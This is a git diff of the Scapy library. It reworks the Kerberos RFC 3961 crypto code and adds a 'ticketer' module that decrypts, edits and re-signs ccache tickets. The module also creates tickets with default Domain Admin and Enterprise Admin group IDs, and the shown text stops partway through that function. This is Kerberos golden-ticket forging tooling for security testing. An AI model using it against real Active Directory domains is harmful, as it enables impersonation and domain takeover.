bytes # Return a four-byte string for an RFC 3961 keyusage, using - # the RFC 4757 rules. Per the errata, do not map 9 to 8. + # the RFC 4757 rules sect 3. Per the errata, do not map 9 to 8. table = {3: 8, 23: 13} msusage = table[keyusage] if keyusage in table else keyusage return struct.pack(" Key + if params is not None and params != b"": + raise ValueError("Invalid RC4 string-to-key parameters") utf16string = plain_str(string).encode("UTF-16LE") - return Key(cls.etype, key=MD4.new(utf16string).digest()) + return Key(cls.etype, key=Hash_MD4().digest(utf16string)) @classmethod def encrypt(cls, key, keyusage, plaintext, confounder): + # type: (Key, int, bytes, Optional[bytes]) -> bytes if confounder is None: confounder = os.urandom(8) - ki = HMAC.new(key.key, cls.usage_str(keyusage), MD5).digest() - cksum = HMAC.new(ki, confounder + plaintext, MD5).digest() - ke = HMAC.new(ki, cksum, MD5).digest() - return cksum + ARC4.new(ke).encrypt(bytes(confounder + plaintext)) + ki = Hmac_MD5(key.key).digest(cls.usage_str(keyusage)) + cksum = Hmac_MD5(ki).digest(confounder + plaintext) + ke = Hmac_MD5(ki).digest(cksum) + rc4 = Cipher(algorithms.ARC4(ke), mode=None).encryptor() + return cksum + rc4.update(bytes(confounder + plaintext)) @classmethod def decrypt(cls, key, keyusage, ciphertext): + # type: (Key, int, bytes) -> bytes if len(ciphertext) < 24: raise ValueError("ciphertext too short") - cksum, basic_ctext = bytearray(ciphertext[:16]), bytearray(ciphertext[16:]) - ki = HMAC.new(key.key, cls.usage_str(keyusage), MD5).digest() - ke = HMAC.new(ki, cksum, MD5).digest() - basic_plaintext = bytearray(ARC4.new(ke).decrypt(bytes(basic_ctext))) - exp_cksum = bytearray(HMAC.new(ki, basic_plaintext, MD5).digest()) + cksum, basic_ctext = ciphertext[:16], ciphertext[16:] + ki = Hmac_MD5(key.key).digest(cls.usage_str(keyusage)) + ke = Hmac_MD5(ki).digest(cksum) + rc4 = Cipher(algorithms.ARC4(ke), mode=None).decryptor() + basic_plaintext = rc4.update(bytes(basic_ctext)) + exp_cksum = Hmac_MD5(ki).digest(basic_plaintext) ok = _mac_equal(cksum, exp_cksum) if not ok and keyusage == 9: # Try again with usage 8, due to RFC 4757 errata. - ki = HMAC.new(key.key, struct.pack(" bytes + return Hmac_SHA(key.key).digest(string) -class _ChecksumProfile(object): - # Base class for checksum profiles. Usable checksum classes must - # define: - # * checksum - # * verify (if verification is not just checksum-and-compare) - @classmethod - def verify(cls, key, keyusage, text, cksum): - expected = cls.checksum(key, keyusage, text) - if not _mac_equal(bytearray(cksum), bytearray(expected)): - raise InvalidChecksum("checksum verification failure") +############ +# RFC 8009 # +############ -class _SimplifiedChecksum(_ChecksumProfile): - # Base class for checksums using the RFC 3961 simplified profile. - # Defines the checksum and verify methods. Subclasses must - # define: - # * macsize: Size of checksum in bytes - # * enc: Profile of associated etype +class _AESEncryptionType_SHA256_SHA384(_AESEncryptionType_SHA1_96, abc.ABCMeta): + enctypename = None # type: bytes + hashmod: _GenericHash = None # Scapy + _hashmod: hashes.HashAlgorithm = None # Cryptography + + # Turn on RFC 8009 mode + rfc8009 = True @classmethod - def checksum(cls, key, keyusage, text): - kc = cls.enc.derive(key, struct.pack(">IB", keyusage, 0x99)) - hmac = HMAC.new(kc.key, text, cls.enc.hashmod).digest() - return hmac[: cls.macsize] + def derive(cls, key, label, k, context=b""): # type: ignore + # type: (Key, bytes, int, bytes) -> bytes + """ + Also known as "KDF-HMAC-SHA2" in RFC8009. + """ + # RFC 8009 sect 3 + return SP800108_KDFCTR( + K_I=key.key, + Label=label, + Context=context, + L=k, + hashmod=cls.hashmod, + ) @classmethod - def verify(cls, key, keyusage, text, cksum): - if key.etype != cls.enc.etype: - raise ValueError("Wrong key type for checksum") - super(_SimplifiedChecksum, cls).verify(key, keyusage, text, cksum) + def string_to_key(cls, string, salt, params): + # type: (bytes, bytes, Optional[bytes]) -> Key + # RFC 8009 sect 4 + iterations = struct.unpack(">L", params or b"\x00\x00\x80\x00")[0] + saltp = cls.enctypename + b"\x00" + salt + kdf = PBKDF2HMAC( + algorithm=cls._hashmod(), + length=cls.seedsize, + salt=saltp, + iterations=iterations, + ) + tkey = cls.random_to_key(kdf.derive(string)) + return Key( + cls.etype, + key=cls.derive(tkey, b"kerberos", cls.keysize * 8), + ) + @classmethod + def prf(cls, key, string): + # type: (Key, bytes) -> bytes + return cls.derive(key, b"prf", cls.hashmod.hash_len * 8, string) -class _SHA1AES128(_SimplifiedChecksum): - macsize = 12 - enc = _AES128CTS +class _AES128CTS_SHA256_128(_AESEncryptionType_SHA256_SHA384): + etype = EncryptionType.AES128_CTS_HMAC_SHA256_128 + keysize = 16 + seedsize = 16 + macsize = 16 + reqcksum = ChecksumType.HMAC_SHA256_128_AES128 + # _AESEncryptionType_SHA256_SHA384 parameters + enctypename = b"aes128-cts-hmac-sha256-128" + hashmod = Hash_SHA256 + _hashmod = hashes.SHA256 -class _SHA1AES256(_SimplifiedChecksum): - macsize = 12 - enc = _AES256CTS +class _AES256CTS_SHA384_192(_AESEncryptionType_SHA256_SHA384): + etype = EncryptionType.AES256_CTS_HMAC_SHA384_192 + keysize = 32 + seedsize = 32 + macsize = 24 + reqcksum = ChecksumType.HMAC_SHA384_192_AES256 + # _AESEncryptionType_SHA256_SHA384 parameters + enctypename = b"aes256-cts-hmac-sha384-192" + hashmod = Hash_SHA384 + _hashmod = hashes.SHA384 -class _SHA1DES3(_SimplifiedChecksum): - macsize = 20 - enc = _DES3CBC +class _SHA256_128_AES128(_SimplifiedChecksum): + macsize = 16 + enc = _AES128CTS_SHA256_128 + rfc8009 = True -class _HMACMD5(_ChecksumProfile): - @classmethod - def checksum(cls, key, keyusage, text): - ksign = HMAC.new(key.key, b"signaturekey\0", MD5).digest() - md5hash = MD5.new(_RC4.usage_str(keyusage) + text).digest() - return HMAC.new(ksign, md5hash, MD5).digest() - @classmethod - def verify(cls, key, keyusage, text, cksum): - if key.etype != EncryptionType.RC4: - raise ValueError("Wrong key type for checksum") - super(_HMACMD5, cls).verify(key, keyusage, text, cksum) +class _SHA384_182_AES256(_SimplifiedChecksum): + macsize = 24 + enc = _AES256CTS_SHA384_192 + rfc8009 = True + +############## +# Key object # +############## _enctypes = { - EncryptionType.DES_MD5: _DESMD5, - EncryptionType.DES_MD4: _DESMD4, - EncryptionType.DES3: _DES3CBC, - EncryptionType.AES128: _AES128CTS, - EncryptionType.AES256: _AES256CTS, - EncryptionType.RC4: _RC4, + # DES_CBC_CRC - UNIMPLEMENTED + EncryptionType.DES_CBC_MD5: _DESMD5, + EncryptionType.DES_CBC_MD4: _DESMD4, + # DES3_CBC_SHA1 - UNIMPLEMENTED + EncryptionType.DES3_CBC_SHA1_KD: _DES3CBC, + EncryptionType.AES128_CTS_HMAC_SHA1_96: _AES128CTS_SHA1_96, + EncryptionType.AES256_CTS_HMAC_SHA1_96: _AES256CTS_SHA1_96, + EncryptionType.AES128_CTS_HMAC_SHA256_128: _AES128CTS_SHA256_128, + EncryptionType.AES256_CTS_HMAC_SHA384_192: _AES256CTS_SHA384_192, + # CAMELLIA128-CTS-CMAC - UNIMPLEMENTED + # CAMELLIA256-CTS-CMAC - UNIMPLEMENTED + EncryptionType.RC4_HMAC: _RC4, } _checksums = { - ChecksumType.SHA1_DES3: _SHA1DES3, - ChecksumType.SHA1_AES128: _SHA1AES128, - ChecksumType.SHA1_AES256: _SHA1AES256, + ChecksumType.CRC32: _CRC32, + # RSA_MD4 - UNIMPLEMENTED + # RSA_MD4_DES - UNIMPLEMENTED + # RSA_MD5 - UNIMPLEMENTED + # RSA_MD5_DES - UNIMPLEMENTED + # SHA1 - UNIMPLEMENTED + ChecksumType.HMAC_SHA1_DES3_KD: _SHA1DES3, + # HMAC_SHA1_DES3 - UNIMPLEMENTED + ChecksumType.HMAC_SHA1_96_AES128: _SHA1_96_AES128, + ChecksumType.HMAC_SHA1_96_AES256: _SHA1_96_AES256, + # CMAC-CAMELLIA128 - UNIMPLEMENTED + # CMAC-CAMELLIA256 - UNIMPLEMENTED + ChecksumType.HMAC_SHA256_128_AES128: _SHA256_128_AES128, + ChecksumType.HMAC_SHA384_192_AES256: _SHA384_182_AES256, ChecksumType.HMAC_MD5: _HMACMD5, 0xFFFFFF76: _HMACMD5, } class Key(object): - def __init__(self, etype, cksumtype=None, key=None): - self.eptype = etype - try: - self.ep = _enctypes[etype] - except ValueError: - raise ValueError("Unknown etype '%s'" % etype) + def __init__(self, + etype: Union[EncryptionType, int, None] = None, + cksumtype: Union[ChecksumType, int, None] = None, + key: bytes = b"") -> None: + """ + Kerberos Key object. + + :param etype: the EncryptionType + :param cksumtype: the ChecksumType + :param key: the bytes containing the key bytes for this Key. + """ + assert etype or cksumtype, "Provide an etype or a cksumtype !" + assert key, "Provide a key !" + if isinstance(etype, int): + etype = EncryptionType(etype) + if isinstance(cksumtype, int): + cksumtype = ChecksumType(cksumtype) + self.etype = etype + if etype is not None: + try: + self.ep = _enctypes[etype] + except ValueError: + raise ValueError("UNKNOWN/UNIMPLEMENTED etype '%s'" % etype) + if len(key) != self.ep.keysize: + raise ValueError( + "Wrong key length. Got %s. Expected %s" + % (len(key), self.ep.keysize) + ) + if cksumtype is None and self.ep.reqcksum in _checksums: + cksumtype = self.ep.reqcksum self.cksumtype = cksumtype if cksumtype is not None: try: - self.cp = _checksums[etype] + self.cp = _checksums[cksumtype] except ValueError: - raise ValueError("Unknown etype '%s'" % etype) - if key is not None and len(key) != self.ep.keysize: - raise ValueError( - "Wrong key length. Got %s. Expected %s" % (len(key), self.ep.keysize) - ) + raise ValueError("UNKNOWN/UNIMPLEMENTED cksumtype '%s'" % cksumtype) + if self.etype is None and issubclass(self.cp, _SimplifiedChecksum): + self.etype = self.cp.enc.etype # type: ignore self.key = key def __repr__(self): + # type: () -> str + if self.etype: + name = self.etype.name + elif self.cksumtype: + name = self.cksumtype.name + else: + return "" return "" % ( - self.eptype, - " (%s octets)" % len(self.key) if self.key is not None else "", + name, + " (%s octets)" % len(self.key), ) def encrypt(self, keyusage, plaintext, confounder=None): + # type: (int, bytes, Optional[bytes]) -> bytes + """ + Encrypt data using the current Key. + + :param keyusage: the key usage + :param plaintext: the plain text to encrypt + :param confounder: (optional) choose the confounder. Otherwise random. + """ return self.ep.encrypt(self, keyusage, bytes(plaintext), confounder) def decrypt(self, keyusage, ciphertext): + # type: (int, bytes) -> bytes + """ + Decrypt data using the current Key. + + :param keyusage: the key usage + :param ciphertext: the encrypted text to decrypt + """ # Throw InvalidChecksum on checksum failure. Throw ValueError on # invalid key enctype or malformed ciphertext. return self.ep.decrypt(self, keyusage, ciphertext) def prf(self, string): + # type: (bytes) -> bytes return self.ep.prf(self, string) - def make_checksum(self, keyusage, text): + def make_checksum(self, keyusage, text, cksumtype=None): + # type: (int, bytes, Optional[int]) -> bytes + """ + Create a checksum using the current Key. + + :param keyusage: the key usage + :param text: the text to create a checksum from + :param cksumtype: (optional) override the checksum type + """ + if cksumtype is not None and cksumtype != self.cksumtype: + # Clone key and use a different cksumtype + return Key( + cksumtype=cksumtype, + key=self.key, + ).make_checksum(keyusage=keyusage, text=text) if self.cksumtype is None: - raise ValueError("checksumtype not specified !") + raise ValueError("cksumtype not specified !") return self.cp.checksum(self, keyusage, text) - def verify_checksum(self, keyusage, text, cksum): + def verify_checksum(self, keyusage, text, cksum, cksumtype=None): + # type: (int, bytes, bytes, Optional[int]) -> None + """ + Verify a checksum using the current Key. + + :param keyusage: the key usage + :param text: the text to verify + :param cksum: the expected checksum + :param cksumtype: (optional) override the checksum type + """ + if cksumtype is not None and cksumtype != self.cksumtype: + # Clone key and use a different cksumtype + return Key( + cksumtype=cksumtype, + key=self.key, + ).verify_checksum(keyusage=keyusage, text=text, cksum=cksum) # Throw InvalidChecksum exception on checksum failure. Throw # ValueError on invalid cksumtype, invalid key enctype, or # malformed checksum. if self.cksumtype is None: - raise ValueError("checksumtype not specified !") + raise ValueError("cksumtype not specified !") self.cp.verify(self, keyusage, text, cksum) @classmethod def random_to_key(cls, etype, seed): + # type: (EncryptionType, bytes) -> Key + """ + random-to-key per RFC3961 + + This is used to create a random Key from a seed. + """ try: ep = _enctypes[etype] except ValueError: @@ -709,6 +1318,12 @@ def random_to_key(cls, etype, seed): @classmethod def string_to_key(cls, etype, string, salt, params=None): + # type: (EncryptionType, bytes, bytes, Optional[bytes]) -> Key + """ + string-to-key per RFC3961 + + This is typically used to create a Key object from a password + salt + """ try: ep = _enctypes[etype] except ValueError: @@ -716,12 +1331,19 @@ def string_to_key(cls, etype, string, salt, params=None): return ep.string_to_key(string, salt, params) +############ +# RFC 6113 # +############ + + def KRB_FX_CF2(key1, key2, pepper1, pepper2): + # type: (Key, Key, bytes, bytes) -> Key """ KRB-FX-CF2 RFC6113 """ def prfplus(key, pepper): + # type: (Key, bytes) -> bytes # Produce l bytes of output using the RFC 6113 PRF+ function. out = b"" count = 1 @@ -731,7 +1353,7 @@ def prfplus(key, pepper): return out[: key.ep.seedsize] return Key( - key1.eptype, + key1.etype, key=bytes( _xorbytes( bytearray(prfplus(key1, pepper1)), bytearray(prfplus(key2, pepper2)) diff --git a/scapy/main.py b/scapy/main.py index 2cb176ceee1..e58df253fb4 100644 --- a/scapy/main.py +++ b/scapy/main.py @@ -48,7 +48,8 @@ ) LAYER_ALIASES = { - "tls": "tls.all" + "tls": "tls.all", + "msrpce": "msrpce.all", } QUOTES = [ @@ -359,11 +360,12 @@ def _scapy_exts(): """Load Scapy exts and return their builtins""" from scapy.config import conf res = {} - for ext in conf.exts.exts: - for mod in ext.modules.values(): + for modname, spec in conf.exts.all_specs.items(): + if spec.default: + mod = sys.modules[modname] res.update({ k: v - for k, v in mod.module.__dict__.copy().items() + for k, v in mod.__dict__.copy().items() if _validate_local(k) }) return res @@ -791,16 +793,30 @@ def interact(mydict=None, argv=None, mybanner=None, loglevel=logging.INFO): log_loading.warning("%s requested but not found !" % imp) conf.interactive_shell = "python" - # Display warning when using the default REPL + # Default shell if conf.interactive_shell == "python": - log_loading.info( - "When using the default Python shell, AutoCompletion, History are disabled." - ) + disabled = ["History"] if WINDOWS: - log_loading.info( - "On Windows, colors are also disabled" - ) + disabled.append("Colors") conf.color_theme = BlackAndWhite() + else: + try: + # Bad completer.. but better than nothing + import rlcompleter + import readline + readline.set_completer( + rlcompleter.Completer(namespace=SESSION).complete + ) + readline.parse_and_bind('tab: complete') + except ImportError: + disabled.insert(0, "AutoCompletion") + # Display warning when using the default REPL + log_loading.info( + "Using the default Python shell: %s %s disabled." % ( + ",".join(disabled), + "is" if len(disabled) == 1 else "are" + ) + ) # ptpython configure function def ptpython_configure(repl): diff --git a/scapy/modules/ticketer.py b/scapy/modules/ticketer.py new file mode 100644 index 00000000000..fadb5f7e626 --- /dev/null +++ b/scapy/modules/ticketer.py @@ -0,0 +1,2173 @@ +# SPDX-License-Identifier: GPL-2.0-or-later OR MPL-2.0 +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) Gabriel Potter + +# flake8: noqa + +""" +Create/Edit Kerberos ticket using Scapy + +See https://scapy.readthedocs.io/en/latest/layers/kerberos.html +""" + +from datetime import datetime, timedelta, timezone + +import collections +import platform +import struct +import random +import re + +from scapy.asn1.asn1 import ( + ASN1_BIT_STRING, + ASN1_GENERAL_STRING, + ASN1_GENERALIZED_TIME, + ASN1_INTEGER, + ASN1_STRING, +) +from scapy.compat import bytes_hex, hex_bytes +from scapy.config import conf +from scapy.error import log_interactive +from scapy.fields import ( + ByteField, + FieldLenField, + FlagsField, + IntEnumField, + IntField, + PacketField, + PacketListField, + ShortEnumField, + ShortField, + StrLenField, + UTCTimeField, +) +from scapy.packet import Packet +from scapy.utils import pretty_list + +from scapy.layers.dcerpc import NDRUnion +from scapy.layers.kerberos import ( + AuthorizationData, + AuthorizationDataItem, + EncTicketPart, + EncryptedData, + EncryptionKey, + KRB_Ticket, + KerberosClient, + KerberosSSP, + PrincipalName, + TransitedEncoding, + kpasswd, + krb_as_req, + krb_tgs_req, + _AD_TYPES, + _ADDR_TYPES, + _KRB_E_TYPES, + _KRB_S_TYPES, + _PRINCIPAL_NAME_TYPES, + _TICKET_FLAGS, +) +from scapy.layers.msrpce.mspac import ( + CLAIM_ENTRY, + CLAIMS_ARRAY, + CLAIMS_SET, + CLAIMS_SET_METADATA, + CYPHER_BLOCK, + FILETIME, + GROUP_MEMBERSHIP, + KERB_SID_AND_ATTRIBUTES, + KERB_VALIDATION_INFO, + PAC_ATTRIBUTES_INFO, + PAC_CLIENT_CLAIMS_INFO, + PAC_CLIENT_INFO, + PAC_INFO_BUFFER, + PAC_INFO_BUFFER, + PAC_REQUESTOR, + PAC_SIGNATURE_DATA, + PACTYPE, + RPC_SID_IDENTIFIER_AUTHORITY, + RPC_UNICODE_STRING, + SID, + UPN_DNS_INFO, + USER_SESSION_KEY, + CLAIM_ENTRY_sub2, +) +from scapy.layers.smb2 import ( + WINNT_SID, + WINNT_SID_IDENTIFIER_AUTHORITY, +) + +from scapy.libs.rfc3961 import EncryptionType, Key, _checksums + +try: + import tkinter as tk + import tkinter.simpledialog as tksd + from tkinter import ttk +except ImportError: + raise ImportError("tkinter is not installed (`apt install python3-tk` on debian)") + +# CCache +# https://web.mit.edu/kerberos/krb5-latest/doc/formats/ccache_file_format.html (official doc but garbage) +# https://josefsson.org/shishi/ccache.txt (much better) + + +class CCCountedOctetString(Packet): + fields_desc = [ + FieldLenField("length", None, length_of="data", fmt="I"), + StrLenField("data", b"", length_from=lambda pkt: pkt.length), + ] + + def guess_payload_class(self, payload): + return conf.padding_layer + + +class CCPrincipal(Packet): + fields_desc = [ + IntEnumField("name_type", 0, _PRINCIPAL_NAME_TYPES), + FieldLenField("num_components", None, count_of="components", fmt="I"), + PacketField("realm", CCCountedOctetString(), CCCountedOctetString), + PacketListField( + "components", + [], + CCCountedOctetString, + count_from=lambda pkt: pkt.num_components, + ), + ] + + def toPN(self): + return "%s@%s" % ( + "/".join(x.data.decode() for x in self.components), + self.realm.data.decode(), + ) + + def guess_payload_class(self, payload): + return conf.padding_layer + + +class CCDeltaTime(Packet): + fields_desc = [ + IntField("time_offset", 0), + IntField("usec_offset", 0), + ] + + def guess_payload_class(self, payload): + return conf.padding_layer + + +class CCHeader(Packet): + fields_desc = [ + ShortEnumField("tag", 1, {1: "DeltaTime"}), + ShortField("taglen", 8), + PacketField("tagdata", CCDeltaTime(), CCDeltaTime), + ] + + def guess_payload_class(self, payload): + return conf.padding_layer + + +class CCKeyBlock(Packet): + fields_desc = [ + ShortEnumField("keytype", 0, _KRB_E_TYPES), + ShortField("etype", 0), + FieldLenField("keylen", None, length_of="keyvalue"), + StrLenField("keyvalue", b"", length_from=lambda pkt: pkt.keylen), + ] + + def toKey(self): + return Key(self.keytype, key=self.keyvalue) + + def guess_payload_class(self, payload): + return conf.padding_layer + + +class CCAddress(Packet): + fields_desc = [ + ShortEnumField("addrtype", 0, _ADDR_TYPES), + PacketField("address", CCCountedOctetString(), CCCountedOctetString), + ] + + def guess_payload_class(self, payload): + return conf.padding_layer + + +class CCAuthData(Packet): + fields_desc = [ + ShortEnumField("authtype", 0, _AD_TYPES), + PacketField("authdata", CCCountedOctetString(), CCCountedOctetString), + ] + + def guess_payload_class(self, payload): + return conf.padding_layer + + +class CCCredential(Packet): + fields_desc = [ + PacketField("client", CCPrincipal(), CCPrincipal), + PacketField("server", CCPrincipal(), CCPrincipal), + PacketField("keyblock", CCKeyBlock(), CCKeyBlock), + UTCTimeField("authtime", None), + UTCTimeField("starttime", None), + UTCTimeField("endtime", None), + UTCTimeField("renew_till", None), + ByteField("is_skey", 0), + FlagsField( + "ticket_flags", + 0, + 32, + # stored in reversed byte order (wtf) + (_TICKET_FLAGS + [""] * (32 - len(_TICKET_FLAGS)))[::-1], + ), + FieldLenField("num_address", None, count_of="addrs", fmt="I"), + PacketListField("addrs", [], CCAddress, count_from=lambda pkt: pkt.num_address), + FieldLenField("num_authdata", None, count_of="authdata", fmt="I"), + PacketListField( + "authdata", [], CCAuthData, count_from=lambda pkt: pkt.num_authdata + ), + PacketField("ticket", CCCountedOctetString(), CCCountedOctetString), + PacketField("second_ticket", CCCountedOctetString(), CCCountedOctetString), + ] + + def guess_payload_class(self, payload): + return conf.padding_layer + + def set_from_krb(self, tkt, clientpart, sessionkey, kdcrep): + self.ticket.data = bytes(tkt) + + # Set sname + self.server.name_type = tkt.sname.nameType.val + self.server.realm = CCCountedOctetString(data=tkt.realm.val) + self.server.components = [ + CCCountedOctetString(data=x.val) for x in tkt.sname.nameString + ] + + # Set cname + self.client.name_type = clientpart.cname.nameType.val + self.client.realm = CCCountedOctetString(data=clientpart.crealm.val) + self.client.components = [ + CCCountedOctetString(data=x.val) for x in clientpart.cname.nameString + ] + + # Set the sessionkey + self.keyblock = CCKeyBlock( + keytype=sessionkey.etype, + keyvalue=sessionkey.key, + ) + + # Set timestamps + self.authtime = kdcrep.authtime.datetime.timestamp() + if kdcrep.starttime is not None: + self.starttime = kdcrep.starttime.datetime.timestamp() + self.endtime = kdcrep.endtime.datetime.timestamp() + if kdcrep.flags.val[8] == "1": # renewable + self.renew_till = kdcrep.renewTill.datetime.timestamp() + + # Set flags + self.ticket_flags = int(kdcrep.flags.val, 2) + + +class CCache(Packet): + fields_desc = [ + ShortField("file_format_version", 0x0504), + ShortField("headerlen", 0), + PacketListField("headers", [], CCHeader, length_from=lambda pkt: pkt.headerlen), + PacketField("primary_principal", CCPrincipal(), CCPrincipal), + PacketListField("credentials", [], CCCredential), + ] + + +# TK scrollFrame (MPL-2.0) +# Credits to @mp035 +# https://gist.github.com/mp035/9f2027c3ef9172264532fcd6262f3b01 + + +class ScrollFrame(tk.Frame): + def __init__(self, parent): + super().__init__(parent) + + self.canvas = tk.Canvas(self, borderwidth=0) + self.viewPort = ttk.Frame(self.canvas) + self.vsb = tk.Scrollbar(self, orient="vertical", command=self.canvas.yview) + self.canvas.configure(yscrollcommand=self.vsb.set) + + self.vsb.pack(side="right", fill="y") + self.canvas.pack(side="left", fill="both", expand=True) + self.canvas_window = self.canvas.create_window( + (4, 4), window=self.viewPort, anchor="nw", tags="self.viewPort" + ) + + self.viewPort.bind("", self.onFrameConfigure) + self.canvas.bind("", self.onCanvasConfigure) + + self.viewPort.bind("", self.onEnter) + self.viewPort.bind("", self.onLeave) + + self.onFrameConfigure(None) + + def onFrameConfigure(self, event): + """Reset the scroll region to encompass the inner frame""" + self.canvas.configure(scrollregion=self.canvas.bbox("all")) + + def onCanvasConfigure(self, event): + """Reset the canvas window to encompass inner frame when required""" + canvas_width = event.width + self.canvas.itemconfig(self.canvas_window, width=canvas_width) + + def onMouseWheel(self, event): + if platform.system() == "Windows": + self.canvas.yview_scroll(int(-1 * (event.delta / 120)), "units") + elif platform.system() == "Darwin": + self.canvas.yview_scroll(int(-1 * event.delta), "units") + else: + if event.num == 4: + self.canvas.yview_scroll(-1, "units") + elif event.num == 5: + self.canvas.yview_scroll(1, "units") + + def onEnter(self, event): + if platform.system() == "Linux": + self.canvas.bind_all("", self.onMouseWheel) + self.canvas.bind_all("", self.onMouseWheel) + else: + self.canvas.bind_all("", self.onMouseWheel) + + def onLeave(self, event): + if platform.system() == "Linux": + self.canvas.unbind_all("") + self.canvas.unbind_all("") + else: + self.canvas.unbind_all("") + + +# Build ticketer + + +class Ticketer: + def __init__(self): + self._data = collections.defaultdict(dict) + self.fname = None + self.ccache = CCache() + self.hashes_cache = collections.defaultdict(dict) + + def open_file(self, fname): + """ + Load CCache from file + """ + self.fname = fname + self.hashes_cache = collections.defaultdict(dict) + with open(self.fname, "rb") as fd: + self.ccache = CCache(fd.read()) + + def save(self, fname=None): + """ + Save opened CCache file + """ + if fname: + self.fname = fname + if not self.fname: + raise ValueError("No file opened. Specify the 'fname' argument !") + with open(self.fname, "wb") as fd: + return fd.write(bytes(self.ccache)) + + def show(self): + """ + Show the content of a CCache + """ + if not self.ccache.credentials: + print("No tickets in CCache !") + return + else: + print("Tickets:") + + def _to_str(x): + if x is None: + return "None" + else: + x = datetime.fromtimestamp(x) + return x.strftime("%d/%m/%y %H:%M:%S") + + for i, cred in enumerate(self.ccache.credentials): + if cred.keyblock.keytype == 0: + continue + print( + "%s. %s -> %s" + % ( + i, + cred.client.toPN(), + cred.server.toPN(), + ) + ) + print(cred.sprintf(" %ticket_flags%")) + print( + pretty_list( + [ + ( + _to_str(cred.starttime), + _to_str(cred.endtime), + _to_str(cred.renew_till), + _to_str(cred.authtime), + ) + ], + [("Start time", "End time", "Renew until", "Auth time")], + ) + ) + print() + + def _prompt(self, msg): + try: + from prompt_toolkit import prompt + + return prompt(msg) + except ImportError: + return input(msg) + + def _prompt_hash(self, spn, etype=None, cksumtype=None, hash=None): + if etype: + hashtype = _KRB_E_TYPES[etype] + elif cksumtype: + hashtype = _KRB_S_TYPES[cksumtype] + else: + raise ValueError("No cksumtype nor etype specified") + if not hash: + if spn in self.hashes_cache and hashtype in self.hashes_cache[spn]: + hash = self.hashes_cache[spn][hashtype] + else: + msg = "Enter the %s hash for %s (as hex): " % (hashtype, spn) + hash = hex_bytes(self._prompt(msg)) + if ( + hash + == b"\xaa\xd3\xb45\xb5\x14\x04\xee\xaa\xd3\xb45\xb5\x14\x04\xee" + ): + log_interactive.warning( + "This hash is the LM 'no password' hash. Is that what you intended?" + ) + key = Key(etype=etype, cksumtype=cksumtype, key=hash) + self.hashes_cache[spn][hashtype] = hash + if key and etype and key.cksumtype: + self.hashes_cache[spn][_KRB_S_TYPES[key.cksumtype]] = hash + return key + + def dec_ticket(self, i, key=None, hash=None): + """ + Get the decrypted ticket by credentials ID + """ + cred = self.ccache.credentials[i] + tkt = KRB_Ticket(cred.ticket.data) + if key is None: + key = self._prompt_hash( + tkt.getSPN(), + etype=tkt.encPart.etype.val, + hash=hash, + ) + try: + return tkt.encPart.decrypt(key) + except Exception: + try: + del self.hashes_cache[tkt.getSPN()] + except IndexError: + pass + raise + + def update_ticket(self, i, decTkt, resign=False, hash=None, kdc_hash=None): + """ + Update a decrypted ticket by credentials ID + """ + # Get CCCredential + cred = self.ccache.credentials[i] + tkt = KRB_Ticket(cred.ticket.data) + + # Optional: resign the new ticket + if resign: + # resign the ticket + decTkt = self._resign_ticket( + decTkt, + tkt.getSPN(), + hash=hash, + kdc_hash=kdc_hash, + ) + + # Encrypt the new ticket + key = self._prompt_hash( + tkt.getSPN(), + etype=tkt.encPart.etype.val, + hash=hash, + ) + tkt.encPart.encrypt(key, bytes(decTkt)) + + # Update the CCCredential with the new ticket + cred.set_from_krb( + tkt, + decTkt, + decTkt.key.toKey(), + decTkt, + ) + + def import_krb(self, res, key=None, hash=None, _inplace=None): + """ + Import the result of krb_[tgs/as]_req into the CCache. + + :param obj: a KRB_Ticket object or a AS_REP/TGS_REP object + :param sessionkey: the session key that comes along the ticket + """ + # Instantiate CCCredential + if _inplace is not None: + cred = self.ccache.credentials[_inplace] + else: + cred = CCCredential() + + # Update the cred + if isinstance(res, KRB_Ticket): + if key is None: + key = self._prompt_hash( + res.getSPN(), + etype=res.encPart.etype.val, + hash=hash, + ) + decTkt = res.encPart.decrypt(key) + cred.set_from_krb( + res, + decTkt, + decTkt.key.toKey(), + decTkt, + ) + else: + if isinstance(res, KerberosClient.RES_AS_MODE): + rep = res.asrep + elif isinstance(res, KerberosClient.RES_TGS_MODE): + rep = res.tgsrep + else: + raise ValueError("Unknown type of obj !") + cred.set_from_krb( + rep.ticket, + rep, + res.sessionkey, + res.kdcrep, + ) + + # Append to ccache + if _inplace is None: + self.ccache.credentials.append(cred) + + def export_krb(self, i): + """ + Export a full ticket, session key, UPN and SPN. + """ + cred = self.ccache.credentials[i] + return ( + KRB_Ticket(cred.ticket.data), + cred.keyblock.toKey(), + cred.client.toPN(), + cred.server.toPN(), + ) + + def ssp(self, i): + """ + Create a KerberosSSP from a ticket + """ + ticket, sessionkey, upn, spn = self.export_krb(i) + return KerberosSSP( + ST=ticket, + KEY=sessionkey, + UPN=upn, + SPN=spn, + ) + + def _add_cred(self, decTkt, hash=None, kdc_hash=None): + """ + Add a decoded ticket to the CCache + """ + cred = CCCredential() + etype = ( + self._prompt("What key should we use (AES128-CTS-HMAC-SHA1-96/AES256-CTS-HMAC-SHA1-96/RC4-HMAC) ? [AES256-CTS-HMAC-SHA1-96]: ") + or "AES256-CTS-HMAC-SHA1-96" + ) + if etype not in _KRB_E_TYPES.values(): + print("Unknown keytype") + return + etype = next(k for k, v in _KRB_E_TYPES.items() if v == etype) + cred.ticket.data = bytes( + KRB_Ticket( + realm=decTkt.crealm, + sname=PrincipalName( + nameString=[ + ASN1_GENERAL_STRING(b"krbtgt"), + decTkt.crealm, + ], + nameType=ASN1_INTEGER(2), # NT-SRV-INST + ), + encPart=EncryptedData( + etype=etype, + ), + ) + ) + self.ccache.credentials.append(cred) + self.update_ticket( + len(self.ccache.credentials) - 1, + decTkt, + resign=True, + hash=hash, + kdc_hash=kdc_hash, + ) + + def create_ticket(self, **kwargs): + """ + Create a Kerberos ticket + """ + user = kwargs.get("user", self._prompt("User [User]: ") or "User") + domain = kwargs.get( + "domain", (self._prompt("Domain [DOM.LOCAL]: ") or "DOM.LOCAL").upper() + ) + domain_sid = kwargs.get( + "domain_sid", + self._prompt("Domain SID [S-1-5-21-1-2-3]: ") or "S-1-5-21-1-2-3", + ) + group_ids = kwargs.get( + "group_ids", + [ + int(x.strip()) + for x in ( + self._prompt("Group IDs [513, 512, 520, 518, 519]: ") + or "513, 512, 520, 518, 519" + ).split(",") + ], + ) + user_id = kwargs.get("user_id", int(self._prompt("User ID [500]: ") or "500")) + primary_group_id = kwargs.get( + "primary_group_id", int(self._prompt("Primary Group ID [513]: ") or "513") + ) + 